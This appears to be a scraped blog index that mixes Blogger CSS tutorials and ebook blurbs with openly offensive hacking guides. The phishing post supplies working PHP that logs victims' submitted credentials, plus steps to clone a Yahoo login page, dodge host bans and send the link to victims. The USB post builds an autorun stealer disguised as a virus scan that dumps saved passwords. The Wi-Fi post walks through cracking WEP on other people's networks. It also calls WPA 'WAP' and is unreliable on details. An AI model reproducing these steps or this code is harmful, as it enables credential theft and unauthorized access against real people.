Hacking Exposed-Fiftth Edition

Hacking Exposed: Network Security Secrets & Solutions, Fifth Edition by Stuart McClure, Joel Scambray and George Kurtz McGraw-Hill/Osborne © 2005 (692 pages) ISBN:9780072260816 Using real-world case studies and detailed examples of the latest devious break-ins, this book shows IT professionals how to protect computers and networks against the most recent security vulnerabilities.
 Table of Contents 
 Hacking Exposed—Network Security Secrets & Solutions, Fifth Edition
 Foreword Introduction

Part I - Casing the Establishment
      Chapter 1 - Footprinting
       Chapter 2 - Scanning
      Chapter 3 - Enumeration

Part II - System Hacking 
     Chapter 4 - Hacking Windows
     Chapter 5 - Hacking UNIX
     Chapter 6 - Remote Connectivity and VoIP Hacking

 Part III - Network Hacking 
     Chapter 7 - Network Devices
     Chapter 8 - Wireless Hacking
     Chapter 9 - Firewalls
    Chapter 10 - Denial of Service Attacks

 Part IV - Software Hacking 
     Chapter 11 - Hacking Code
     Chapter 12 - Web Hacking
     Chapter 13 - Hacking the Internet User

Part V - Appendixes
 Appendix A - Ports
 Appendix B - Top 14 Security Vulnerabilities
 Index List of Figures
 List of Tables
 List of Code Listings
 List of Sidebars

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hacking For Beginners.

                       Computer hacking is the practice of altering computer hardware and software to carry out a goal outside of the creator original intention. People who slot in computer hacking actions and activities are often entitled as hackers. The majority of people assume that hackers are computer criminals. They fall short to identify the fact that criminals an hackers are two entirely unrelated things. Media is liable for this. Hackers in realism are good and extremely intelligent people, who by using their knowledge in a constructive mode help organizations, companies, government, etc. to secur credentials and secret information on the Internet. Years ago, no one had to worry about Crackers breaking into their computer and installing Trojan viruses, or using your computer to send attacks against others. Now that thing have changed, it's best to be aware of how to defend your computer from damaging intrusions and prevent black hat hackers. Rampant hacking is systematically victimizing computers around the world. This hacking is not only common, but is being executed without a flaw that the attackers compromise a system, steal everything of value and entirely rub out their pathway within 20 minutes. So, in this Book y will uncover the finest ways to defend your computer systems from the hackers This Book is written by keeping one object in mind that a beginner, who is not much familiar regarding computer hackin can easily, attempts these hacks and recognize what we are trying to demonstrate. Here we have incorporated the best ethical hacking articles in this volume, covering every characteristic linked to computer security. After Reading this book you will come to recognize that how Hacking is affecting our every day routine work and can be very hazardous in many fields like bank account hacking etc. Moreover, after carrying out this book in detail you will be capable of understanding that how a hacker hacks and how you can defend yourself from these threats. So Take care of yourself and Defend Yourself By hacking the hacker and be safe after that. So If you know how to hack a hacker then you can know how to prevent the hacker. “Hack It and Have It...” - Manthan Desai (author)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Dangerous Google - Searching For Secrets

Google serves some 80 percent of all search queries on the Internet, mak - ing it by far the most popular search engine. Its popularity is due not only to excel - lent search effectiveness, but also extensive querying capabilities. However, we should also remember that the Internet is a highly dynamic medium, so the results presented by Google are not always up-to-date – some search results might be stale, while other relevant resources might not yet have been visited by Googlebot (the automatic script that browses and indexes Web resources for Google). Table 1 presents a summary of the most important and most useful query operators along with their descriptions, while Figure 1 shows document locations referred to by the operators when applied to Web searches. Of course, this is just a handful of examples – skil - ful Google querying can lead to much more interesting results.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Little Black Book Of Computer Viruses

This is the first in a series of three books about computer viruses. In these volumes I want to challenge you to think in new ways about viruses, and break down false concepts and wrong ways of thinking, and go on from there to discuss the relevance of computer viruses in today’s world. These books are not a call to a witch hunt, or manuals for protecting yourself from viruses. On the contrary, they will teach you how to design viruses, deploy them, and make them better. All three volumes are full of source code for viruses, including both new and well known varieties. It is inevitable that these books will offend some people. In fact, I hope they do. They need to.
 I am convinced that computer viruses are not evil and that programmers have a right to create them, posses them and experiment with them. That kind of a stand is going to offend a lot of people, no matter how it is presented. Even a purely technical treatment of viruses which simply dis- cussed how to write them and provided some examples would be offensive. The mere thought of a million well armed hackers out there is enough to drive some bureaucrats mad. These books go beyond a technical treatment, though, to defend the idea that viruses can be useful, interesting, and just plain fun. That is bound to prove even more offensive. Still, the truth is the truth, and it needs to be spoken, even if it is offensive. Morals and ethics cannot be deter- mined by a majority vote, any more than they can be determined by the barrel of a gun or a loud mouth. Might does not make right.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

501 Website Secrets



Contents at a Glance

Acknowledgments .........................................................................................................ix
Introduction .................................................................................................................. xix

Part I: Secrets of the Internet Portals .........................................1
Chapter 1: Yahoo! Secrets  ..............................................................................................3
Chapter 2: MSN Secrets  ............................................................................................... 55
Chapter 3: AOL.com Secrets  ........................................................................................ 75
Chapter 4: Excite Secrets  ............................................................................................. 89
Chapter 5: Lycos Secrets  ..............................................................................................99
Part II : Secrets of the Internet Search Engines .................... 117

Chapter 6: Google Secrets  ......................................................................................... 119
Chapter 7: AllTheWeb Secrets  .................................................................................. 161
Chapter 8: Ask Jeeves Secrets  ...................................................................................171
Chapter 9: AltaVista Secrets  ...................................................................................... 181
Chapter 10: HotBot Secrets  ........................................................................................ 195
Part III: Secrets of the Online News and
Information Sites  ....................................................................... 209

Chapter 11: CNN.com Secrets ...................................................................................211
Chapter 12: ESPN.com Secrets  .................................................................................. 231
Chapter 13: CBS MarketWatch Secrets  .................................................................... 247
Chapter 14: Weather.com Secrets  ............................................................................. 265
Chapter 15: Microsoft.com Secrets ............................................................................281
Part IV: Secrets of Online Shopping and Services .............293

Chapter 16: eBay Secrets  ........................................................................................... 295
Chapter 17: Amazon.com Secrets  .............................................................................. 319
Chapter 18: Napster 2.0 Secrets  ................................................................................345
Chapter 19: Expedia Secrets  ...................................................................................... 361
Chapter 20: MapQuest Secrets  .................................................................................. 371
Index  ................................................................................................383

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to create vertical Menu













We have learned how to create horizontal menu  before. Now we will try to make a vertical menu. We will make a vertical menu like the image. Ok let's do it

1. Login to blogger then choose "Layout-->Edit HTML"
2. Put the script below before this code ]]></b:skin> or put it in CSS code area.

.glossymenu, .glossymenu li ul{
list-style-type: none;
margin: 0;
padding: 0;
width: 185px; /*WIDTH OF MAIN MENU ITEMS*/
border: 1px solid black;
}
.glossymenu li{
position: relative;
}
.glossymenu li a{
background: white url('http://blog.superinhost.com/vertical/blue1.gif') repeat-x bottom left;
font: bold 12px Verdana, Helvetica, sans-serif;
color: white;
display: block;
width: auto;
padding: 5px 0;
padding-left: 10px;
text-decoration: none;
}
.glossymenu li ul{
position: absolute;
width: 190px;
left: 0;
top: 0;
display: none;
}
.glossymenu li ul li{
float: left;
}
.glossymenu li ul a{
width: 180px;
}
.glossymenu li a:visited, .glossymenu li a:active{
color: white;
}
.glossymenu li a:hover{
background-image: url('http://blog.superinhost.com/vertical/blue2.gif');
}

* html .glossymenu li { float: left; height: 1%; }
* html .glossymenu li a { height: 1%; }


You can change the menu color, look at the red text (blue1.gif and blue2.gif). Change it with some color menu below. For example, if you want to choose red color, then the code would be like this :
.glossymenu li a{
background: white url('http://blog.superinhost.com/vertical/red.gif') repeat-x bottom left;

dan
.glossymenu li a:hover{
background-image: url('http://blog.superinhost.com/vertical/red.gif');


Vertical Menu Color :

blue1.gif
blue2.gif
green1.gif
green2.gif
red1.gif
red2.gif
pink1.gif
pink2.gif
black1.gif
black2.gif


3. Save your template.
4. Then go to "Page Elements" menu
5. choose "Add a Gadget -->HTML/JavaScript" the insert the code below.

<ul id="verticalmenu" class="glossymenu">
<li><a href="/">Home</a></li>
<li><a href="http://trik-tips.blogspot.com">Trik Blog</a></li>
<li><a href="http://x-template.blogspot.com" >Free Template</a></li>
<li><a href="http://getebook.co.cc">Free Ebook</a></li>
</li>
</ul>


Note :
- The red code is the links.
- The Blue code is anchor text.
- If you want to add menu, just copy the blink code and paste it.

6. Then click "Save"

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Reposition Navigation Buttons in Blog

reposition navigation links in bloggerThe navigation buttons or links that are displayed at the bottom of each comment section in BlogSpot blogs enable visitors to switch between new and old posts or move from one post page to another ordered by date and time. These buttons become less of use when number of comments increase too much. Normally readers do not even observe the navigation deep down and this results in loss of precious pageviews. I have always emphasized that value pageviews more than unique visitors because it is indeed pageviews that turns into revenue generating page impressions both for AdSense or any other Ad Network.  You might have seen the More, Next and Previous button showing inside the top black sticky bar on MBT homepage and post pages. It is really not possible to shift a Post data item to any other widget section in blogger. Doing such results in "Data variable not found in dictionary" error or similar.
We played a work around and used Cascading stylesheet Position properties to allocate fixed positions to these buttons anywhere on the page. This is again a unique addition to Blogger Customization and being implemented for the first time. The tutorial today will not only help you change the position of navigation links but will also teach you to install a custom sticky bar just like the one we are using on our blog. We are pretty sure you will find today's tutorial really easy yet delicious!
PS: Tested with Chrome, Firefox, IE9 & Safari.

STEP1: Adding the sticky bar

First comes first. I have already shared a detailed tutorial on adding a stickybar to blogger. Please first install a stickybar on your blogs and then try step#2 of today's tutorial.
Note: The style that I am using on MBT is different from that of the tutorial so if you want a similar color theme then simply copy the stylesheet from MBT source file or let me know to help you.

STEP2:

Now comes the interesting part. What we will do here is simply shifting your current Newer, Older & Home buttons to the top left of the stickybar and replace them with more fancy buttons like the one we are using.  Follow these steps:
  1. Go To Blogger > Template
  2. Backup your template
  3. Click Edit HTML and then check "Expand Widget Templates"
  4. Search for the following CSS classes and delete them all: You will find three such classes or more starting with either #blog-pager or .blog-pager
#blog-pager {
------
}

#blog-pager-newer-link {
----
---
--
}
#blog-pager-older-link {
-----
---

--
}

   5.   Now after you have deleted them, add the following code in their place:
#blog-pager {
text-align:center;
}
#blog-pager-newer-link {
position:fixed;
z-index:9999;
margin-left:-320px;
top:0px;
margin-top:5px;
}
#blog-pager-older-link {
position:fixed;
z-index:9999;
margin-left:-290px;
top:0px;
margin-top:5px;
}
#blog-pager-more-link {
position:fixed;
z-index:9999;
margin-left:-20px;
top:0px;
margin-top:5px;
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
#blog-pager-newer-link {
position:fixed;
z-index:9999;
margin-left:-627px;
top:0px;
}
#blog-pager-older-link {
position:fixed;
z-index:9999;
margin-left:-597px;
top:0px;
}
}

What we did in step4 and step5 was simply replacing your old code with the new one.
    6.   Next search for the following chunk of code:
Note: You are only concerned with finding the two highlighted codes. The code inside them may look different for your template so just finding these two highlighted tags and then follow step7.
<b:includable id='nextprev'>
  <div class='blog-pager' id='blog-pager'>
    <b:if cond='data:newerPageUrl'>
      <span id='blog-pager-newer-link'>
      <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-newer-link&quot;' title='Previous'>&#171; Prev</a>
      </span>
    </b:if>
    <b:if cond='data:olderPageUrl'>
      <span id='blog-pager-older-link'>
      <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-older-link&quot;' title='Next'>Next &#187;</a>
      </span>
    </b:if>
<span id='home-link'>
    <a class='home-link' expr:href='data:blog.homepageUrl'><data:homeMsg/></a>
</span>
    <b:if cond='data:mobileLinkUrl'>
      <div class='blog-mobile-link'>
        <a expr:href='data:mobileLinkUrl'><data:mobileLinkMsg/></a>
      </div>
    </b:if>
  </div>
  <div class='clear'/>
</b:includable>
     7.  Replace the code inside them with the following code as shown below:
<b:includable id='nextprev'>
<b:if cond='data:blog.url == data:blog.homepageUrl'>
   <b:if cond='data:olderPageUrl'>
      <span id='blog-pager-more-link'>
      <a class='blog-pager-more-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-older-link&quot;'><img src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrYWm3gI23EQru18D61fvQPmQVJ-1l96nz0Yjm6a9W6p34eaFo6ZB3F-WSPItQdnyyLlsj_wMaquI4de1ghzgA4bn8ZTVg1BX-UY8fjSrQhKPd-lGrCprVxxiFIZkX2KzYJNfa9M_57XyM/s400/more.png'/></a>
      </span>
      </b:if>
</b:if>

<b:if cond='data:blog.url != data:blog.homepageUrl'>
  <div class='blog-pager' id='blog-pager'>
    <b:if cond='data:newerPageUrl'>
      <span id='blog-pager-newer-link'>
      <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-newer-link&quot;'><img src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCQIiTV9kAXDc42IrsrEVsMRNB0YysQv6PhHHvC4XN-bAzsKK7VBEmdxIufoCxaJHZaWf9cgH3AZoh73ylPY2lft03sEaYNzr9Pqs9Lic3b4Jdczvh4H4dYvpfUV7Cf11yW50i60XkroPZ/s400/Previous.png'/></a>
      </span>
    </b:if>
    <b:if cond='data:olderPageUrl'>
      <span id='blog-pager-older-link'>
      <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-older-link&quot;'><img src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYDgD_LsS7XLaCcXC9Xf6wIiZxt1oUbFL5PfxmgeJmaahEhmMUKLf-SjXlZRX_2c7dm4aD0G9usr0keb_gKsQbd9nOE_HTe-ABgV1O6PxUP2_VeyhzkjesiwDe3YA6Y92vJMB3IFIapd7b/s400/Next.png'/></a>
      </span>
      <b:else/>
 
    </b:if>
  </div>
  <div class='clear'/> </b:if>
</b:includable>
It was that easy!
   8. All done! Visit your Blog to see it functioning just fine.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to Add Google Plus Followers Gadget To Blogger.

Google Plus Followers' WidgetOne of the best perks of using Google is, it has products that seamlessly integrate with each other to provide an easy and comprehensive interface to users. For example, Google Drive can be used to attach files with emails quickly. You can +1 posts outside Google+, and share search results on Google Plus. You can even auto-publish your Blogger blog feed to your G+ profile. And that is by no means the end of it. In fact, Google just announced a brand new feature, the Google Plus Followers gadget for blogger blogs! This new Google Plus followers' gadget for blogspot blogs will provide another layer of integration between your Google Plus profile and your Blogger/Blogspot blog.

The Google Plus followers' gadget


Connecting your Google Plus profile with your blog is a great way to enhance your readership by increasing your followers and engaging better with your audience. You can auto-publish your blog posts on your Google Plus stream so as to deliver your content right where your readers want it delivered. Those readers can then recommend your content directly, which can lead to more exposure. This new Google Plus followers widget is another step towards enhancing your readership and boosting your authority.
This widget will tell the world how many people are following you, and will also show them some friendly faces (different for each person). It also has a follow button by default, which lets users follow your Google Plus profile page with a single click. This will help in getting your content across multiple streams, and to reach more readers on a more personal level through your blog.
Adding this widget to your Blogger blog is really simple. But for it to work, you first have to connect your blogger profile with your Google Plus account. We have detailed the process in a previous post, so make sure you read it first.
  • How to automatically share blog updates on Google Plus
Once done, visit the Layout tab on your blogger dashboard, and select "Add a Gadget". You will then be able to see and add this widget easily to your blog.
A note from Google: For those who are using Google Friend Connect followers' widget, they can keep using it, even though Google retired most of Friend Connect services earlier this year. For the time being, it will keep running on Blogger.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How you can creat Phisher

Requirements

1) A web hosting account
There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The Problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you. so the Smart choice is to Put some useful articles on the website that you will be getting at Doteasy Free Hosting and side by side you can also host phisher in the separate directory for example: yourname.domain.com/mywork.
Free Webhosting: Doteasy Free Hosting (read note below)
Note : Never use any suspicious keywords like gmail, facebook, hotmail, gmail-login, etc in the subdomain or username. if you use, you will get banned for sure. Instead use your own name or any other name.
2) A fake login page
To create a fake login page, just visit the desired login page. lets say yahoo’s login page. now Right Click on that page and click on ‘view source’ or view ‘page source’. after this a new window will open with the source code. just select all the code using ctrl+a and copy it with ctrl+c. open notepad and paste this code in it. and save it with extension .html on the desktop.
for eg:- yahoo.html
3) A php code that writes data on to a text file
Just copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php
<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

4) A text file to save hacked password
Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file

Creating phisher

Now we have the 3 required files yahoo.html,code.php,password.txt on the desktop.
The next task is to link(connect) the 3 files. such that we must link them in the order yahoo.html>>code.php>>passwords.txt.
ie yahoo.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt
Linking yahoo.html and code.php
Just open yahoo.html with text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding ‘action’ field you will see something like this:

Replace everything in red with code.php, and save the file.

You just connected yahoo.html to code.php
[ * ] There may be more than one action field. follow the same procedure of Replacing with Code.php
Linking code.php and passwords.txt
In the above given code, passwords.txt is already connected with code.php.
Now just open code.php with text editor and  in the 2nd line replace “original login page” with the desired original login page of your phisher.
In our eg it is https://login.yahoo.com/config/login_verify2?&.src=ym and save it.
You just told code.php to open passwords.txt file when run and after the victim enters the login details, redirect him to the original login page.
Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.

Hosting Phisher

#step1 login to your newly created free hosting account
#step2 click on ‘file manager’ to open file manager
#step3 now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
#step4 Now just create a new directory(folder) and name it according to phisher you have created.
#step5 navigate to the desired directory that you just created in ‘step3′
#step6 Upload all the 3 files(phisher) ie yahoo.html,code.php,passwords.txt in this directory.
note- all the 3 files must be in the same directory.
#step7 copy the addresses of .html and .txt files
#step8 Send this phisher to your victim. just send the link (.html file’s address) to your victim via email or any other medium.
#step9 be patient . When the victim logs in on your fake page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.
That’s it! you are done. enjoy!

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Add Official Twitter Follow Button to Blogger




Adding Twitter Follow Button to your website, making it easy for you to discover the Twitter accounts of your favorite reporters, athletes, celebrities, and other personalities. Using the Follow Button is as simple as a single click. You can also see the profile and latest Tweets of the account you want to follow by clicking the username next to the Button.

For publishers and brands, adding the Follow Button to your website and using Twitter to stay connected with your audience is a powerful combination. People who follow your account are much more likely to retweet and engage with your Tweets, and to repeatedly visit your website. Adding the Follow Button to your website is quick and easy.


Follow the steps given below add twitter follow button to your blog posts.

Step 1 : Go to "Edit HTML". Click on "Expand Widget Templates"

Step 2 : Scroll down to where you see below code:

<div class='post-header-line-1'/>

Step 6 : Now Copy below code and paste it just below the above code.

NOTE: If you can't find <div class='post-header-line-1'/> in your template, paste the code just before <data:post.body/> .


<div style='float:right;margin-right:5px;'>Your Twitter Code Here</div>

Now replace "Your Twitter Code Here" with the code, taken using below link:


Now save your template and you are done.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

XXS Attacks






Xss Attacks is a Great Book on Cross site Scripting.

Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks


                                                           

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

THE SECRET OF HACKING




Steps :-

download this ebook from below
Now open the .rar file and click on certificate.pfx
Then it will ask for password
Enter the password :- mh2005
Now open the hacking e-book provided1. INTRODUCTION TO REAL HACKING  

Topics:-

1. INTRODUCTION TO REAL HACKING
2. ADVANCED MALWARE RESEARCH
3. WINDOWS HACKING
4. PASSWORD HACKING
5. EMAIL HACKING
6. WEB APPLICATION HACKING
7. WEBSITE DEFACEMENT AND DOMAIN HACKING
8. MISCELLANEOUS HACKING
9. MOBILE AND COMPUTER FORENSIC
10. VOIP AND WIRELESS HACKING
11. VULNERABILITY DISCOVERY AND PENETRATION TESTING
12. ADVANCE HACKING WITH METASPLOIT
13. FIREWALL, IDS AND HONEY POT HACKING.
14. SECURING SYSTEM

File Information :-

Name :- THE SECRET OF HACKING 
Size :- 1.70 Mb

                                                      

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Ghost in the Wires by Kevin Mitnick




Kevin Mitnick was the most elusive computer break-in artist in history. He accessed computers and networks at the world's biggest companies--and however fast the authorities were, Mitnick was faster, sprinting through phone switches, computer systems, and cellular networks. He spent years skipping through cyberspace, always three steps ahead and labeled unstoppable. But for Kevin, hacking wasn't just about technological feats-it was an old fashioned confidence game that required guile and deception to trick the unwitting out of valuable information.

Driven by a powerful urge to accomplish the impossible, Mitnick bypassed security systems and blazed into major organizations including Motorola, Sun Microsystems, and Pacific Bell. But as the FBI's net began to tighten, Kevin went on the run, engaging in an increasingly sophisticated cat and mouse game that led through false identities, a host of cities, plenty of close shaves, and an ultimate showdown with the Feds, who would stop at nothing to bring him down.

Ghost in the Wires is a thrilling true story of intrigue, suspense, and unbelievable escape, and a portrait of a visionary whose creativity, skills, and persistence forced the authorities to rethink the way they pursued him, inspiring ripples that brought permanent changes in the way people and companies protect their most sensitive information.

                                                         

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

USB Stealer Steal Password

We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device.Sounds different but yes it is possible i found a way to perform it .

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password fox:Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now Downloaded All the required things come to some real stuff

Note:Kindly disable your antivirus before performing these steps

Steps to create Own Usb Stealer

1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.


After this you can see saved password in .TXT files


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Wifi Hacking

Wireless Wi-Fi Modem Network Hacking Complete Tutorial


Many of the friends ask me about how to hack wifi network .so here is the tutorial that will explain how to hack wifi.
In our daily life some time our laptop catching so many wi-fi signals but none of them is accessible..and we think “I wish I could some how break the password and access free internet”.
if you are thinking like that than this tutorial will definitely help you in cracking password of wi-fi network for free internet.
 
Tutorial on hacking wi-fi Network

First of all you need to scan for available wireless networks.

you can use“NetStumbler” or "Kismet" for Windows and Linux and KisMac for Mac
Below is a screenshot of NetStumbler.. It will show you a list of all the wireless access points in your range.

It’ll also show how the Wi-fi network is secured..

Now the main par comes The two most common encryption types are:
 
1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)



WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
 
How to Crack WEP

This is the practically tested way to hack wi-fi network.

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time

The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

 
Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.


2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.


6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.


7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Now you have learn how to hack wi-fi network.
This is the most practically way to hack wi-fi network working genuinely.Always put your try and i am sure this tutorial is helpful to you.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Introduction To Information Technology


What is a Computer?

A computer is an electronic device, operating under the control of instructions (software) stored in its own memory unit, that can accept data (input), manipulate data (process), and produce information (output) from the processing.

The computer has become an integral part of our lives.

Generally, the term is used to describe a collection of devices that function together as a system.

What Does A Computer Do?


Computers can perform four general operations, which comprise the information processing cycle.
  •     Input
  •      Process
  •     OutputStorage

File Password: mrtozzir



    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    All About Random Access Memory(RAM) Part 2

    DRAM PM

    The DRAM (Dynamic RAM) is the most common type of memory at the start of this millennium. This is a memory whose transistors are arranged in a matrix in rows and columns. A transistor, coupled with a capacitor, gives information on a bit. Since 1 octet contains 8 bits, a DRAM memory module of 256 Mo will thus contain 256 * 2^10 * 2^10 = 256 * 1024 * 1024 = 268,435,456 octets = 268,435,456 * 8 = 2,147,483,648 bits = 2,147,483,648 transistors. A module of 256 Mo thus has a capacity of 268,435,456 octets, or 268 Mo! These memories have access times of 60 ns.
    Furthermore, access to memory generally concerns data stored consecutively in the memory. Thus burst mode allows access to the three pieces of data following the first piece with no additional latency time. In this burst mode, time required to access the first piece of data is equal to cycle time plus latency time, and the time required to access the other three pieces of data is equal to just the cycle time; the four access times are thus written in the form X-Y-Y-Y, for example 5-3-3-3 indicates a memory for which 5 clock cycles are needed to access the first piece of data and 3 for the subsequent ones.

    DRAM FPM

    To speed up access to the DRAM, there is a technique, known as paging, which involves accessing data located in the same column by changing only the address of the row, thus avoiding repetition of the column number between reading of each row. This is known as DRAM FPM (Fast Page Mode). FPM achieves access times of around 70 to 80 nanoseconds for operating frequency between 25 and 33 Mhz.

    DRAM EDO

    DRAM EDO (Extended Data Out, sometimes also called hyper-page") was introduced in 1995. The technique used with this type of memory involves addressing the next column while reading the data in a column. This creates an overlap of access thus saving time on each cycle. EDO memory access time is thus around 50 to 60 nanoseconds for operating frequency between 33 and 66 Mhz.
    Thus the RAM EDO, when used in burst mode, achieves 5-2-2-2 cycles, representing a gain of 4 cycles on access to 4 pieces of data. Since the EDO memory did not work with frequencies higher than 66 Mhz, it was abandoned in favour of the SDRAM.

    SDRAM

    The SDRAM (Synchronous DRAM), introduced in 1997, allows synchronised reading of data with the mother-board bus, unlike the EDO and FPM memories (known as asynchronous) which have their own clock. The SDRAM thus eliminates waiting times due to synchronisation with the mother-board. This achieves a 5-1-1-1 burst mode cycle, with a gain of 3 cycles in comparison with the RAM EDO. The SDRAM is thus able to operate with frequency up to 150 Mhz, allowing it to achieve access times of around 10 ns.

    DR-SDRAM (Rambus DRAM)

    The DR-SDRAM (Direct Rambus DRAM) is a type of memory that lets you transfer data to a 16-bit bus at frequency of 800Mhz, giving it a bandwidth of 1.6 Go/s. As with the SDRAM, this type of memory is synchronised with the bus clock to enhance data exchange. However, the RAMBUS memory is a proprietary technology, meaning that any company wishing to produce RAM modules using this technology must pay royalties to both RAMBUS and Intel.

    DDR-SDRAM

    The DDR-SDRAM (Double Data Rate SDRAM) is a memory, based on the SDRAM technology, which doubles the transfer rate of the SDRAM using the same frequency.
